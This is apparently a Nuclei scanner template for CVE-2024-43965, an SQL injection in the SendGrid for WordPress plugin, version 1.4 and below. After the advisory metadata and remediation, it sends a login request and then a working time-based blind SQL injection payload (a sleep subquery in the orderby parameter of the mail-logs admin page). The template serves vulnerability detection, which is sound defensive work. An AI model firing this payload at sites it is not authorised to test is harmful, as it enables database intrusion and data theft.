id: CVE-2024-43965 info: name: SendGrid for WordPress <= 1.4 - SQL Injection author: Shivam Kamboj severity: critical description: | Smackcoders SendGrid for WordPress [affected versions 1.4 and below] contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires crafted input. impact: | Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion. remediation: | Update to the latest version of SendGrid for WordPress, version 1.5 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-43965 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-sendgrid-mailer/sendgrid-for-wordpress-14-unauthenticated-sql-injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-43965 epss-score: 0.18426 epss-percentile: 0.95404 cwe-id: CWE-89 metadata: verified: true max-request: 3 tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-sendgrid-mailer,unauth flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1 matchers: - type: dsl dsl: - status_code == 302 - contains(header, "wordpress_logged_in") condition: and internal: true - raw: - | @timeout: 30s GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time%2c(select*from(select(sleep(8)))a)&order=asc HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'duration >= 8' - 'contains_all(body, "wp-mailplus", "SendGrid")' condition: and # digest: 4a0a00473045022100915f9f25661962b7c5ab2ff2da05fb1973d724c8d7b2b496d3479b04bb9841b3022050d72b7f92eed438c1efd9438691aec2eaf2b01b141f61a714d63637554d0807:922c64590222798bb761d5b6d8e72950